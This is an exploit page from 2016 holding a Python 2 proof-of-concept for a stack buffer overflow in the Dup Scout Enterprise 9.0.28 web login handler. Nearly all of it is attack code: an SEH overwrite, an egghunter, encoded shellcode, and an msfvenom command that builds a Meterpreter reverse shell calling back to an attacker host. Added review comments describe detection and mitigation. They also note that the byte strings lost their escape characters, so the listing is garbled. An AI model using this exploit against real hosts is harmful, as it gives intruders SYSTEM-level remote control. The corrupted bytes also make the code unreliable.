
Dup Scout Enterprise 9.0.28 Buffer Overflow

Posted on 06 October 2016

#!/usr/bin/python
#Proof-of-concept for a stack buffer overflow in the Dup Scout Enterprise
#9.0.28 web interface login handler (POST /login), reached without valid
#credentials according to the author. Python 2 syntax (print statements).
#NOTE(review): the string literals below appear to have lost characters in
#page extraction (the author's own comment refers to 'x41' bytes); they are
#left exactly as printed, so this listing does not reproduce the original
#byte layout and will not run as intended.
print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust 'x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
#sys is imported but never used in this script.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Target host and port are hard-coded; socket.connect() returns None, so the
#'connect' variable is never meaningful and is unused below.
connect=s.connect(('192.168.123.132',80))
#bad chars x00x0ax0dx26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0ax0dx26' -f python --smallest
#payload size 308
#'buf' is the msfvenom-generated payload (encoded reverse shell per the
#command above); it is placed in the request after the 'w00tw00t' tag so the
#egghunter can locate it.
buf = ""
buf += "xdaxd9xbax43x1bx3fx40xd9x74x24xf4x58x2b"
buf += "xc9xb1x47x31x50x18x03x50x18x83xc0x47xf9"
buf += "xcaxbcxafx7fx34x3dx2fxe0xbcxd8x1ex20xda"
buf += "xa9x30x90xa8xfcxbcx5bxfcx14x37x29x29x1a"
buf += "xf0x84x0fx15x01xb4x6cx34x81xc7xa0x96xb8"
buf += "x07xb5xd7xfdx7ax34x85x56xf0xebx3axd3x4c"
buf += "x30xb0xafx41x30x25x67x63x11xf8xfcx3axb1"
buf += "xfaxd1x36xf8xe4x36x72xb2x9fx8cx08x45x76"
buf += "xddxf1xeaxb7xd2x03xf2xf0xd4xfbx81x08x27"
buf += "x81x91xcex5ax5dx17xd5xfcx16x8fx31xfdxfb"
buf += "x56xb1xf1xb0x1dx9dx15x46xf1x95x21xc3xf4"
buf += "x79xa0x97xd2x5dxe9x4cx7axc7x57x22x83x17"
buf += "x38x9bx21x53xd4xc8x5bx3exb0x3dx56xc1x40"
buf += "x2axe1xb2x72xf5x59x5dx3ex7ex44x9ax41x55"
buf += "x30x34xbcx56x41x1cx7ax02x11x36xabx2bxfa"
buf += "xc6x54xfex97xc3xc2xc1xc0xb7x92xaax12x48"
buf += "x83x76x9axaexf3xd6xccx7exb3x86xacx2ex5b"
buf += "xcdx22x10x7bxeexe8x39x11x01x45x11x8dxb8"
buf += "xccxe9x2cx44xdbx97x6excexe8x68x20x27x84"
buf += "x7axd4xc7xd3x21x72xd7xc9x4cx7ax4dxf6xc6"
buf += "x2dxf9xf4x3fx19xa6x07x6ax12x6fx92xd5x4c"
buf += "x90x72xd6x8cxc6x18xd6xe4xbex78x85x11xc1"
buf += "x54xb9x8ax54x57xe8x7fxfex3fx16xa6xc8x9f"
buf += "xe9x8dxc8xdcx3fxebxbex0cxfc"
#pop pop ret 1006cd33
#nseh/seh overwrite the exception handler record; this is the SEH-overwrite
#technique that Windows SafeSEH/SEHOP are designed to defeat -- verify those
#protections are enabled on hosts running this product (not confirmed here).
nseh = "x90x90xEBx0B"
seh = "x33xcdx06x10"
#Egghunter stub: scans memory for the 'w00tw00t' tag and jumps to 'buf'.
egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7"
#Request as printed: an HTTP POST to /login whose form body is padded to
#roughly 17000 bytes. Detection signal visible in this listing: an
#unauthenticated POST /login with Content-Length: 17000 and a
#username/password body made of thousands of repeated bytes plus the
#'w00tw00t' tag; a body-size limit or IDS rule on the login form would
#flag this shape. Mitigation: upgrade past 9.0.28 and keep the product's web
#service off untrusted networks.
#NOTE(review): header line terminators are also missing as printed.
evil = "POST /login HTTP/1.1 "
evil += "Host: 192.168.123.132 "
evil += "User-Agent: Mozilla/5.0 "
evil += "Connection: close "
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
evil += "Accept-Language: en-us,en;q=0.5 "
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "
evil += "Keep-Alive: 300 "
evil += "Proxy-Connection: keep-alive "
evil += "Content-Type: application/x-www-form-urlencoded "
evil += "Content-Length: 17000 "
evil += "username=admin"
evil += "&password=aaaaa "
evil += "x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "x90" * 20
evil += buf
evil += "x90" * 50
evil += "x42" * 1614
evil += nseh
evil += seh
evil += "x90" * 20
evil += egghunter
evil += "x90" * 7000
print 'Sending evil buffer...'
#Single send() with no response read; errors from send() are not handled.
s.send(evil)
print 'Payload Sent!'
s.close()

 
